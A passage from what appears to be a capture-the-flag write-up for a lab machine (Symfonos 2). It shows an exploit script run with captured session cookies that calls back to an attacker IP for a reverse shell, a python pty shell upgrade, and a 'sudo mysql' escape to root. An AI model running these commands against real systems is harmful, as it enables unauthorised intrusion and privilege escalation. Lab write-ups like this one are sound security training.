python 47044.py http://localhost:9000 "XSRF-TOKEN=eyJpdiI6InJXNnlUNWVmaDZxbVJDQ3JjY2tVZEE9PSIsInZhbHVlIjoidFh0VGhjditaNm9YNWxnaGgxVHIranBiZzBTTTlEYUgzckRiXC9KK0pBT2htXC9cL0FKVEVIYkNwUkZuTmNvK3R3cGdpbEFXeisyTUhqQVBtXC9nU0t5VHh3PT0iLCJtYWMiOiJjNTU1NjcxYzc3Y2Q3ZjBhYjU5NzBhZDA2ZGY0MmI5OWQ2Yzc5N2MyOTcxMWY4YjUzZWJlYzFiZDI3NTJhOWUxIn0%3D; librenms_session=eyJpdiI6IkY3bVU4d2lnSCtTdmlrRjJ1bjRSeUE9PSIsInZhbHVlIjoiSEsxOHhDXC91QytSSmcyMHBJdEkrcUlmSVlrR29VaGp2ckxqQ0I5d1poWlwvQk0rRTBNRnJjQVdWYU5SdENrb1J0Z2VTNnlFS0FQdHdYeUhoQzNvVTE0dz09IiwibWFjIjoiNDRjYTQ4ZDk5NTM2Y2FkNDI4NzAwNDhhMjg2MjRlMTk3MTMzNzIzM2Q2NDI4NjYyNjQ2NjcwZWJmZDcyN2E2YyJ9; PHPSESSID=2jmu3np8ppkk80uu94b620rnc5" 192.168.43.182 5555

We successfully connected to the user cronus

Privilege Escalation

We first get a proper shell by typing

python -c 'import pty; pty.spawn("/bin/bash")'

When we type sudo -l, it will show this to us.

Thanks to this website that my senior sent to me, I manage to find a suitable command to get root from it

sudo mysql -e '\! /bin/sh'

Got root access !

Congratulation!

PreviousSymfonos 1 NextSymfonos 3

Last updated 5 years ago

Was this helpful?